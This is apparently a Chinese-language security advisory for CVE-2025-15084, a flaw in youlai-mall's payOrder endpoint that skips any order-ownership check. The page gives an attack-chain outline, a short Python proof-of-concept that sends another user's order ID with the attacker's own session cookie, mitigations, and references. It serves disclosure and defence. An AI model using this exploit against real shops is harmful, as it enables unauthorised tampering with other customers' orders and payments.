CVE-2025-15084 | youlai-mall订单支付接口权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-15084

漏洞类型

不当访问控制

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

youlai-mall

漏洞概述

CVE-2025-15084是youlai-mall电商系统中存在的一个权限绕过漏洞。该漏洞影响youlai-mall 1.0.0和2.0.0版本，漏洞位于订单支付处理模块的orderService.payOrder函数中。由于程序未对用户身份和订单所有权进行充分的权限验证，攻击者可以在低权限状态下远程利用该漏洞，通过构造恶意请求访问其他用户的订单并尝试执行支付操作。攻击复杂度较高但漏洞利用代码已公开，厂商在收到通知后未做出回应。由于CVSS评分仅为3.1（低危），漏洞的机密性影响为无，完整性影响为低，暂无可用性影响。建议受影响的用户及时关注官方更新并采取临时防护措施。

技术细节

该漏洞源于youlai-mall的订单支付处理模块Order Payment Handler中的访问控制缺陷。具体问题存在于文件mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java的orderService.payOrder方法中。攻击者通过构造特定的HTTP请求参数，可以绕过正常的身份验证和授权检查，直接调用支付接口。漏洞的核心原因是程序未正确验证当前登录用户与目标订单的所属关系，导致任何低权限认证用户都可能尝试支付他人的订单。虽然攻击复杂度较高（需要了解订单ID和支付流程），但由于利用代码已公开，潜在攻击者可以轻易获取相关技术细节进行恶意利用。攻击向量为网络形式，攻击者无需特殊权限即可发起攻击，且无需用户交互。

攻击链分析

STEP 1

步骤1

攻击者注册并登录youlai-mall系统，获取有效的用户会话凭证（低权限账户即可）

STEP 2

步骤2

攻击者通过系统其他功能接口（如订单查询、用户中心等）枚举或猜测其他用户的订单ID

STEP 3

步骤3

攻击者构造恶意HTTP请求，携带自己的会话Cookie但指定目标订单ID，调用payOrder支付接口

STEP 4

步骤4

由于orderService.payOrder函数缺乏订单所有权验证，系统错误地处理了攻击者的支付请求

STEP 5

步骤5

攻击成功执行，可能导致资金损失、订单数据篡改或敏感信息泄露等安全问题

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15084 PoC - youlai-mall Order Payment Authorization Bypass

target_url = "http://target-server/api/oms/order/pay"

# Attackers need to obtain valid order IDs from other users
# This PoC demonstrates the authorization bypass in payOrder function

def exploit_order_payment_bypass(target_url, session_cookie, order_id):
    """
    Exploit unauthorized order payment access
    
    Args:
        target_url: Target vulnerable endpoint
        session_cookie: Valid session cookie for authenticated user
        order_id: Target order ID to pay (belonging to another user)
    
    Returns:
        HTTP response from the vulnerable endpoint
    """
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    payload = {
        "orderId": order_id,
        "payMethod": "wechat",
        "payChannel": "app"
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

# Example usage
# Replace with actual values
session = "JSESSIONID=your_session_id_here"
order_id = 123456789

result = exploit_order_payment_bypass(target_url, session, order_id)
if result:
    print(f"Status Code: {result.status_code}")
    print(f"Response: {result.text}")

# Note: This PoC is for educational and security testing purposes only

影响范围

youlai-mall 1.0.0

youlai-mall 2.0.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制支付接口的访问频率，对异常请求进行拦截；2) 启用支付短信/邮件通知，确保用户及时知晓订单支付行为；3) 对订单ID进行加密或使用不可预测的订单标识符；4) 加强应用层日志审计，监控可疑的跨用户订单访问行为；5) 考虑暂时禁用支付功能，等待官方修复方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15084
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15084
3 Details https://www.cvedetails.com/cve/CVE-2025-15084/
4 VulDB https://vuldb.com/cve/CVE-2025-15084
5 Link https://github.com/Hwwg/cve/issues/24
6 Link https://vuldb.com/?ctiid.338412
7 Link https://vuldb.com/?id.338412
8 Link https://vuldb.com/?submit.708174